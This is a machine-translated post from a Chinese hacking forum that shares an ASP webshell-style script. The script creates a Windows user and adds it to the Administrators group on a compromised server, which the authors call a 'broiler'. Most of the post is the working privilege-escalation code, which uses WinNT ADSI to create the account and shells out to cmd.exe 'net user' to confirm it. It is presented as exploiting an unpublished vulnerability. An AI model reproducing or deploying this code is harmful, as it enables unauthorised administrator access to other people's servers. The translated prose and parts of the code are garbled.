Add superuser. asp code [Original of blue screen, Kevin Improved, Ms Unpublished vulnerability]
Author: Blue screen, Kevin article source: Freezing point limit
In fact, last week, Kevin and I were tested on my broiler and the hippo epic. The result is a successful addition of the Administrators group's users under user permissions (though I can't believe my eyes).
Last time Kevin didn't word, I dare not publish ah .... Now that he's posted on his blog, it's turned around (a bit better than I did last time I tested, plus a form). This is a blessing.
Anyway, the code is right, but rarely success, the specific look at luck. Oh, next I want to integrate him into the ocean. Hey.
Copy Code code as follows:
<form action= "useradd.asp" method=post>
User: <input name= "username" type= "text" value= "kevin1986" ><br>
Password: <input name= "passwd" type= "password" ><br>
<input type= "Submit" value= "Add" >
</form>
<% @codepage =936
On Error Resume Next
If Request.ServerVariables ("REMOTE_ADDR") <> "127.0.0.1" Then
Response.Write "IP!s n0t Right"
Else
If Request ("username") <> "then
Username=request ("username")
Passwd=request ("passwd")
Response.expires=0
Session.timeout=50
server.scripttimeout=3000
Set Lp=server.createobject ("Wscript.Network")
oz= "winnt://" &lp.computername
Set Ob=getobject (oz)
Set oe=getobject (oz& "/administrators,group")
Set od=ob.create ("User", username)
Od. SetPassword passwd
Od. SetInfo
Oe. ADD oz& "/" &username
If Err Then
Response.Write "Ah ~ ~ Today you still don't buy 6+1 ... Save 2 yuan to buy a bottle of cola ...
Else
If InStr (Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c net User" &username.stdout.readall), "Last Login" >0 Then
Response.Write "Although there is no mistake, but it seems to have not established success." You must be depressed.
Else
Response.Write "Omg!" &username& "The account has become!" This is an unknown loophole. 5,000,000RMB it's yours.
End If
End If
Else
Response.Write "Please enter your username"
End If
End If
%>
